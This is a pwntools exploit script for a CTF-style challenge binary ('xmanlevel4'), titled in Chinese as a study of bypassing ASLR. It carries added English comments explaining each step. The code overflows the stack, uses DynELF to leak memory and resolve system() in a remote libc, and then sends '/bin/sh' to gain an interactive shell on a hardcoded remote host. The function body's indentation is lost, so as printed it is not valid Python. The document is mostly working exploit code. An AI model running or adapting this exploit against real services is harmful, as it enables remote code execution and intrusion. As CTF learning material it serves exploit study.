exploit:
栈溢出学习之bypass ASLR:利用DynELF模块leak出内存地址
# pwntools script in Python 2 syntax (`print` statements and
# str.encode('hex') further down); it will not run unchanged on Python 3.
from pwn import *
#p = remote('pwn2.jarvisoj.com', 9880)
# Connection to the challenge service; every send/recv below goes through `p`.
p = remote('218.2.197.235',20433)
# Parse the local copy of the challenge binary for symbol and section addresses.
elf = ELF('./xmanlevel4')
# Addresses for 'write' and 'read' taken from the binary's own symbol table
# (the author names them as PLT stubs). They are read from the file, not
# leaked, so this only works while the binary loads at a fixed address,
# i.e. is not built as PIE.
writeplt = elf.symbols['write']
readplt = elf.symbols['read']
# Fixed address inside the binary, used as the return address of every leak
# call so the overflowed function runs again (see leak()). A constant
# 0x0804xxxx value is another sign the binary is non-PIE; building it with
# PIE (with ASLR enabled) would randomize it.
vulnaddr = 0x804844b
# Writable scratch address 0x200 bytes into .bss; the final stage reads the
# command string into it.
bssaddr = elf.bss(0x200)
# Named like a pop/pop/pop/ret gadget. In the final payload it sits where the
# return address of read() goes, followed by three arguments, which is
# consistent with a gadget that discards them -- not verifiable from this page.
pppraddr = 0x8048509
# Not referenced anywhere else in the visible script.
staraddr = 0x8048350
# Leak primitive handed to DynELF: returns the 4 bytes at `address` in the
# remote process by making the service call write(1, address, 4) through the
# stack overflow, then returning to vulnaddr so the process stays alive and
# can be probed again.
# NOTE: the body is printed without indentation on this page (lost in
# extraction); as shown it is not valid Python.
def leak(address):
# 140 bytes of filler reach the saved return address (taken from the layout:
# the very next dword is the address that gets called). A stack canary would
# break this overwrite, so the binary presumably has none; -fstack-protector
# is the mitigation.
payload = 'a'*140
payload += p32(writeplt)
# Return address of write(): re-enter the vulnerable function.
payload += p32(vulnaddr)
# write() arguments: fd 1 (stdout, i.e. the socket here), source address, length 4.
payload += p32(1)
payload += p32(address)
payload += p32(4)
p.send(payload)
# recv(4) returns up to 4 bytes; if the service sent less, nothing here
# retries and the short value is passed to DynELF unchanged.
data = p.recv(4)
# Python 2 only: print statement and str.encode('hex'). `data or ''` keeps
# the log line from failing when nothing came back.
print "%#x => %s " % (address,(data or '').encode('hex'))
return data
# Second parse of the same binary; the `elf` object above could be reused.
# DynELF resolves symbols in the remote process using only the 4-byte leak()
# primitive, so no copy of the target libc is needed up front -- this is the
# ASLR bypass the page title refers to.
dynelf = DynELF(leak,elf=ELF('./xmanlevel4'))
# Resolve system() in the remote libc. Each lookup drives many leak() calls,
# i.e. many 4-byte write()s by the service on one connection; a burst of
# repeated tiny responses is what this phase looks like on the wire.
sysaddr = dynelf.lookup('system','libc')
print "system address is " + hex(sysaddr)
print "-----------------------------------"
# Final stage, same 140-byte overflow: read(0, bssaddr, 8) pulls 8 bytes from
# the connection into .bss, the gadget at pppraddr is read()'s return address
# and presumably discards the three arguments, then execution continues at
# sysaddr with bssaddr as its argument (p32(1) fills the unused return slot).
payload1 = 'a' * 140
payload1 += p32(readplt)
payload1 += p32(pppraddr)
payload1 += p32(0)
payload1 += p32(bssaddr)
payload1 += p32(8)
payload1 += p32(sysaddr)
payload1 += p32(1)
payload1 += p32(bssaddr)
p.send(payload1)
# 8 bytes, matching the read() length above, terminating NUL included.
p.send('/bin/sh\0')
# Hand the connection over to the user.
p.interactive()